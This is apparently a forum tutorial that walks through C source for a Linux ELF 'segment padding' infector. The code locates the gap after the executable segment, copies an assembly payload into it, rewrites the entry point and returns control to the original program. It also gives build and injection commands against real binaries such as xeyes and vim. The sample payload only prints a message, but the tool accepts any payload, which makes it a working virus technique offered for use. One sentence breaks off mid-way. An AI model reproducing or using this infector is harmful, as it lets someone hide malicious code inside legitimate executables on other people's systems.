Since it doesn't look like @dtm is going to cover Linux stuff, I have written a quick and dirty version of @dtm's great PE File Infector paper, this time targeting ELF binaries under GNU/Linux systems.
The process I will describe is slightly different from the one explained in the PE counterpart, so you will get a different view of the process and hopefully that will help you better understand how these things work. Moreover, it does not feel right to just write the same thing again, even if it targets a different system.
So, let's start.
If you have read the "PE File Infector" paper on this site, you should already know what a code cave is. If you do not, go and read it, right now.
In the Linux world, you will find references to this technique as Segment padding infection. It is basically the same thing; I mention it just in case you want to look for further information.
The infection technique we are going to implement is as follows:
- Find the padding area between the .text segment and the next segment in the program (usually the data segment)
- Append the payload code to the end of the .text segment (in that padding area)
- Patch the ELF binary to run the injected code at startup (modify the ELF entry point)
- Patch the payload to return execution to the original ELF entry point
The technique takes advantage of the padding areas in the segments. This padding exists because the operating system works with page granularity. It is related to the processor's memory management unit, but that is a bit out of scope. So, in general, there is an unused area at the end of the .text segment. The size of that area depends on the size of the code, and it may not exist at all or be just a couple of bytes. For that reason, this technique may not work with some programs.
The main advantage of this technique is that the file size and the overall ELF data structures are not modified at all (with the exception of the application entry point).
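To get a feeling for how much room page granularity can leave, here is a minimal sketch that computes the distance from the end of the code to the next page boundary. The function name is made up for this example, and the 4096-byte page size used below is an assumption that holds on most x86-64 systems. The real gap also depends on where the next segment starts in the file, so treat the result as a rough estimate.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: number of bytes between `end` and the next
   multiple of `page`. `page` is assumed to be a power of two. */
uint64_t padding_to_next_page(uint64_t end, uint64_t page)
{
    assert(page != 0 && (page & (page - 1)) == 0);
    /* The outer mask turns a full page into 0 when `end` is already aligned. */
    return (page - (end & (page - 1))) & (page - 1);
}
```

For a code segment that ends at file offset 0x70c, this gives 0x8f4 bytes, which is plenty for a small payload.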
Writing an Infector
The ELF code injector is pretty straightforward. The main function is a bit long, so I will divide it into smaller functional blocks in the hope that it will be easier to follow.
You can find the whole source code on GitHub.
Opening the target ELF File
The first thing the main function does (after a quick check of the number of parameters) is to open the target ELF File. The code looks like this:
int
main (int argc, char *argv[])
{
  void *d, *d1;
  int target_fd, payload_fd;
  int fsize, fsize1;

  printf ("Segment Padding Infector for 0x00sec\nby pico\n\n");
  if (argc != 3)
    {
      fprintf (stderr, "Usage:\n %s elf_file payload\n", argv[0]);
      exit (1);
    }
  /* Open and map target ELF and payload */
  target_fd = elfi_open_and_map (argv[1], &d, &fsize);
  payload_fd = elfi_open_and_map (argv[2], &d1, &fsize1);
OK, there is not much to say about this: the main function opens and maps the target ELF, into which we will inject our code, and the code to be injected. Let's continue by looking into the elfi_open_and_map function:
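int
elfi_open_and_map (char *fname, void **data, int *len)
{
  int fd, size;
  if ((fd = open (fname, O_APPEND | O_RDWR, 0)) < 0)
    { perror ("open"); exit (1); }
  size = get_file_size (fd);
  if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
                     MAP_SHARED, fd, 0)) == MAP_FAILED)
    { perror ("mmap"); exit (1); }
  /* Print the mapped address (*data), not the address of the pointer */
  printf ("+ File mapped (%d bytes ) at %p\n", size, *data);
  *len = size;
  return fd;
}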
This function does three things:
- It opens the file using open
- Then it uses a utility function called get_file_size to find out the size of the file. We need this information for the last step. The get_file_size function just calls fstat (I will not include it here as it is not really interesting)
- It memory maps the file. This means that we can access the file as if it were in memory (using pointers), but we are actually modifying the file on disk. So, this is a very convenient way of patching a file
The function returns the file descriptor and uses two output parameters to return the pointer to the memory mapped area (that is, the beginning of our file) and its size.
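Since get_file_size is not shown, here is a minimal sketch of what such a helper could look like. This is a guess based on the description above (a thin wrapper around fstat), not the code from the repository; the return type and the error handling are assumptions.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Hypothetical stand-in for get_file_size: returns the size in bytes
   of the file behind `fd`, or -1 if fstat fails. */
long get_file_size(int fd)
{
    struct stat st;

    assert(fd >= 0);
    if (fstat(fd, &st) < 0) {
        perror("fstat");
        return -1;
    }
    return (long) st.st_size;
}
```

Returning -1 instead of exiting lets the caller decide what to do, which is handy if you ever reuse the helper outside this tool.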
Now that we have access to our files, we will store some information:
/* Get Application Entry point */
elf_hdr = (Elf64_Ehdr *) d;
ep = elf_hdr->e_entry;
printf ("+ Target Entry point: %p\n", (void*) ep);
As we said, the pointer returned by elfi_open_and_map points to the actual content of the file. For an ELF file, the first thing we find is the ELF header. Take a look at the specs to find out what information is kept in this structure.
Right now, we are interested in the application entry point. That is the address where the program will start its execution. Think about it as the memory address of the main function... It is not that simple, but for our current discussion such a definition should be OK.
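Before trusting e_entry, it can be worth checking that the mapped file really is a 64-bit ELF. The sketch below is an optional extra that the injector described here does not perform; the function name is made up, and it only looks at the magic bytes and the class field from elf.h.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical check: returns 1 if the `len`-byte image at `d` starts
   with a 64-bit ELF header, 0 otherwise. */
int elfi_is_elf64(const void *d, size_t len)
{
    const Elf64_Ehdr *h = d;

    assert(d != NULL);
    if (len < sizeof(Elf64_Ehdr))
        return 0;                     /* too small to hold the header */
    if (memcmp(h->e_ident, ELFMAG, SELFMAG) != 0)
        return 0;                     /* missing "\x7fELF" magic */
    return h->e_ident[EI_CLASS] == ELFCLASS64;
}
```

In the injector this would be called right after mapping the target, before casting the pointer to Elf64_Ehdr and reading the entry point.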
Finding a gap
Now we have to find a gap in the target file. We have written a function to do that, which we call from the main function:
  Elf64_Phdr *t_text_seg = elfi_find_gap (d, fsize, &p, &len);
  Elf64_Addr base = t_text_seg->p_vaddr;
The elfi_find_gap function goes through all the ELF segments and tries to find the gap in the one that holds the code. It returns a pointer to the ELF segment structure, which we will use later. It also returns the offset of the gap in the file and its size, using a couple of output parameters.
After finding the code segment, we also store the memory address where that code will be loaded. This is usually 0x400000, but it may be different for some applications.
The elfi_find_gap function looks like this:
Elf64_Phdr*
elfi_find_gap (void *d, int fsize, int *p, int *len)
{
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) d;
  Elf64_Phdr* elf_seg, *text_seg = NULL;
  int n_seg = elf_hdr->e_phnum;
  int i;
  int text_end = 0, gap=fsize;

  elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr
                            + (unsigned int) elf_hdr->e_phoff);
  for (i = 0; i < n_seg; i++)
    {
      /* Executable PT_LOAD segment: this is the one holding the code */
      if (elf_seg->p_type == PT_LOAD && (elf_seg->p_flags & PF_X))
        {
          printf ("+ Found .text segment (#%d)\n", i);
          text_seg = elf_seg;
          text_end = elf_seg->p_offset + elf_seg->p_filesz;
        }
      else
        {
          /* Any other PT_LOAD segment: keep the one closest to .text */
          if (elf_seg->p_type == PT_LOAD &&
              (elf_seg->p_offset - text_end) < gap)
            {
              printf (" * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
                      i, (unsigned int)elf_seg->p_offset);
              gap = elf_seg->p_offset - text_end;
            }
        }
      elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg
                                + (unsigned int) elf_hdr->e_phentsize);
    }
  *p = text_end;
  *len = gap;
  printf ("+ .text segment gap at offset 0x%x(0x%x bytes available)\n", text_end, gap);
  return text_seg;
}
Once again, we first access the ELF header to figure out where, within the file, the segment information is stored. It is at the offset given by the header field e_phoff. With this information, we can start checking the segments.
First we look for a segment of type PT_LOAD with execution permissions. Normally there is only one, and it is the one containing the .text section, and therefore the application code. When we find it, we store the pointer to the segment structure (to return it later) and the offset of the actual end of the segment in the file.
Then we keep looking for PT_LOAD segments, calculate the gap between each of them and the executable segment we have already found, and keep the smallest gap.
This function can probably be improved a lot. Normally there are only two PT_LOAD segments and they come one after the other in the file. I was not sure whether those segments can appear out of order in the file (in theory it should be possible), which is why the function is a bit complex.
PT_LOAD segments are those that are loaded directly from the file. Other segments, like the ones containing the stack or the .bss section, are not stored in the file, but the code and static data have to be there, and the PT_LOAD type is how the system knows that the data in the file has to be loaded into memory.
We have to stop looking at our infector code for a sec and take a look at the payload we are going to use and how to get it into memory. I have just written a simple payload that prints a message to the console. I know that is not very impressive, but this is already becoming a long and complex howto.
So, our payload looks like this:
section .text
        global _start
_start:
        mov rax,1                 ; 1 = sys_write
        mov rdi,1                 ; 0 = stdin / 1 = stdout / 2 = stderr
        lea rsi,[rel msg]         ; pointer (memory address) to msg (char *)
        mov rdx, msg_end - msg    ; msg size
        syscall                   ; calls the function stored in rax
        mov rax, 0x11111111       ; mark, patched later with the original entry point
        jmp rax                   ; jump back to the original code
msg     db 'This file has been infected for 0x00SEC',0x0a,0
msg_end db 0x0
It is the classical Hello World assembler program but, just after printing the message, it jumps back to somewhere. The 0x11111111 is a mark where we will have to write the original ELF entry point, to let the original application run normally.
As usual, we can compile this small program with:
nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o
With that done, we can get back to our ELF injector.
Processing the payload
You could just use some external tool to produce a hex dump of the payload code. Check @unh0lys0da's shellcode tutorial for details. In this case, as we are playing with the ELF format, we are going to use the binary produced by nasm and ld directly.
The way we built our payload actually produced an ELF file. If you recall the beginning of the paper, we already opened the payload and mapped it into memory. Now we just need to find out where the actual code is and copy it into the .text segment gap of the target program that we found before.
This is what the code below does:
  Elf64_Shdr *p_text_sec = elfi_find_section (d1, ".text");
  printf ("+ Payload .text section found at %lx (%lx bytes)\n",
          p_text_sec->sh_offset, p_text_sec->sh_size);
  if (p_text_sec->sh_size > len)
    {
      fprintf (stderr, "- Payload too big, cannot infect file.\n");
      exit (1);
    }
  /* Copy payload in the segment padding area */
  memmove (d + p, d1 + p_text_sec->sh_offset, p_text_sec->sh_size);
First we call a function (that we will describe in a sec) to find out where the .text section is, and therefore where the payload code is. The function returns a pointer to an ELF section structure that contains all the information we need.
Then we have to check whether the .text section of the payload (our code) fits in the gap we found earlier, and finally we just copy the payload code into the target file, right at the end of the executable segment. Using the pointer returned by
Finding a Section in an ELF File
So, we have to take a look at the elfi_find_section function. Here it is:
Elf64_Shdr *
elfi_find_section (void *data, char *name)
{
  char *sname;
  int i;
  Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) data;
  Elf64_Shdr *shdr = (Elf64_Shdr *)(data + elf_hdr->e_shoff);
  Elf64_Shdr *sh_strtab = &shdr[elf_hdr->e_shstrndx];
  const char *const sh_strtab_p = data + sh_strtab->sh_offset;
  printf ("+ %d section in file. Looking for section '%s'\n",
          elf_hdr->e_shnum, name);
  for (i = 0; i < elf_hdr->e_shnum; i++)
    {
      sname = (char*) (sh_strtab_p + shdr[i].sh_name);
      if (!strcmp (sname, name)) return &shdr[i];
    }
  return NULL;
}
In order to find a section by name, we have to access the section header string table in the ELF file (the section whose index is stored in the header field e_shstrndx). That table stores the names of all the sections as NUL-terminated, human readable strings.
The section list in the ELF file stores each section name as an offset into that string table. So, despite all that pointer gymnastics, the function is just looping through the section list, retrieving the name using the information there, and comparing that string with the passed parameter.
Just open the ELF spec and start following the data structures. It is tedious, but not difficult.
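The lookup above trusts every offset found in the file. If you want to run it against arbitrary binaries, a more defensive variant could look like the sketch below. This is my own variation under stated assumptions, not the function from the injector: the name find_section_checked and the extra len parameter (the size of the mapping) are invented for the example.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical bounds-checked lookup: returns the header of the section
   called `name`, or NULL if it is absent or if the section table or the
   string table fall outside the `len`-byte image. */
const Elf64_Shdr *find_section_checked(const void *data, size_t len,
                                       const char *name)
{
    const unsigned char *base = data;
    const Elf64_Ehdr *eh = data;
    const Elf64_Shdr *sh, *strtab;
    const char *s;
    size_t i, off, room;

    assert(data != NULL && name != NULL);
    if (len < sizeof *eh || eh->e_shoff > len ||
        (len - eh->e_shoff) / sizeof *sh < eh->e_shnum ||
        eh->e_shstrndx >= eh->e_shnum)
        return NULL;
    sh = (const Elf64_Shdr *) (base + eh->e_shoff);
    strtab = &sh[eh->e_shstrndx];
    if (strtab->sh_offset > len || strtab->sh_size > len - strtab->sh_offset)
        return NULL;

    for (i = 0; i < eh->e_shnum; i++) {
        off = sh[i].sh_name;
        if (off >= strtab->sh_size)
            continue;                 /* name offset outside the table */
        room = strtab->sh_size - off;
        s = (const char *) (base + strtab->sh_offset + off);
        /* Only compare names that are terminated inside the table. */
        if (memchr(s, '\0', room) != NULL && strcmp(s, name) == 0)
            return &sh[i];
    }
    return NULL;
}
```

The logic is the same as before (walk the section headers and compare names), with a few extra checks so that a truncated or corrupted file returns NULL instead of reading outside the mapping.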
Patching Entry Points
So, we are almost done. Now we just need to patch the entry points. This is done with the following code in the main function:
  /* Patch return address */
  elfi_mem_subst (d+p, p_text_sec->sh_size, 0x11111111, (long)ep);
  /* Patch entry point */
  elf_hdr->e_entry = (Elf64_Addr) (base + p);
  /* Close files and actually update target file */
  close (payload_fd);
  close (target_fd);
The elfi_mem_subst function just looks for the sequence 0x11111111 (do you remember it in our payload?) and substitutes it with the original ELF entry point. This will start the target application just after running our payload.
Then, for the main entry point, we just use our ELF header pointer and write there the address of our payload, so it gets executed when the application is started. We calculate the payload address as the base address we got from the executable segment plus the offset of the segment gap we found at the beginning.
Once we are done, we just close the files so that all the changes we made in the memory mapped area make it to the file.
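If you prefer to be explicit about when the changes reach the disk, you can flush and unmap the area before closing the descriptor. The sketch below is an optional extra, not part of the injector described here; the function name is made up, and it only uses the standard msync, munmap and close calls.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical cleanup helper: writes the shared mapping back to the
   file, removes the mapping and closes the descriptor. Returns 0 on
   success and -1 if any step failed. */
int elfi_sync_and_close(int fd, void *data, size_t len)
{
    int rc = 0;

    assert(data != NULL && data != MAP_FAILED);
    if (msync(data, len, MS_SYNC) < 0) { perror("msync");  rc = -1; }
    if (munmap(data, len) < 0)         { perror("munmap"); rc = -1; }
    if (close(fd) < 0)                 { perror("close");  rc = -1; }
    return rc;
}
```

It would be called once per mapped file, with the descriptor, pointer and size that elfi_open_and_map returned.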
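Just for completeness, let's take a look at elfi_mem_subst:
int elfi_mem_subst (void *m, int len, long pat, long val)
{
  unsigned char *p = (unsigned char*)m;
  long v;
  int i, r;
  for (i = 0; i < len; i++)
    {
      v = *((long*)(p+i));
      r = v ^pat;   /* r is an int, so only the low 32 bits are compared */
      if (r ==0)
        {
          printf ("+ Pattern %lx found at offset %d -> %lx\n", pat, i, val);
          /* Write 32 bits only, so the code after the mark is not clobbered */
          *((int*)(p+i)) = val;
          return 0;
        }
    }
  return -1;
}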
Nothing special, we just scan the payload byte by byte to find our mark. When found, it is substituted by the value passed as a parameter (in this case the original entry point).
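A variant that never reads past the end of the payload and avoids unaligned pointer casts could look like the sketch below. It assumes that the assembler encodes the 0x11111111 mark as a 32-bit immediate (worth confirming with a disassembler for your own payload) and that the original entry point fits in 32 bits. The function name is made up for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical 32-bit marker patcher: replaces the first occurrence of
   `pat` in buf[0..len) with `val`. Returns the offset of the match, or
   -1 if the mark is not present. */
long patch_marker32(unsigned char *buf, size_t len, uint32_t pat, uint32_t val)
{
    size_t i;
    uint32_t v;

    assert(buf != NULL);
    for (i = 0; i + sizeof v <= len; i++) {
        memcpy(&v, buf + i, sizeof v);        /* unaligned-safe read */
        if (v == pat) {
            memcpy(buf + i, &val, sizeof val);
            return (long) i;
        }
    }
    return -1;
}
```

Only the four bytes of the mark are overwritten, so the jump instruction that follows it in the payload stays intact.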
Using the injector
So, compile the application and generate your payload
$ make elf_injector
$ nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o
And then just start injecting your payload:
$ ./elf_inject xeyes payload
I have tried the program with some binaries on my system. I have to say that it failed with some of them, and I do not know the reason yet. Some of the ones I successfully used were: xeyes, vim, lynx...
It failed with evince, for instance... So, lucky you, it is not perfect, and you have something to look at and play with :)... Have ELFun!
If you are planning to look further into this topic (you should, it is really interesting), it would be a good idea to install readelf to easily inspect your ELF files.
Also make sure that xxd is available to produce hex dumps and check that you are writing data in the right place.
I have written this pretty quickly, so it may not be the most comprehensive howto and some parts may be hard to follow. Let me know in the comments if something needs improvement.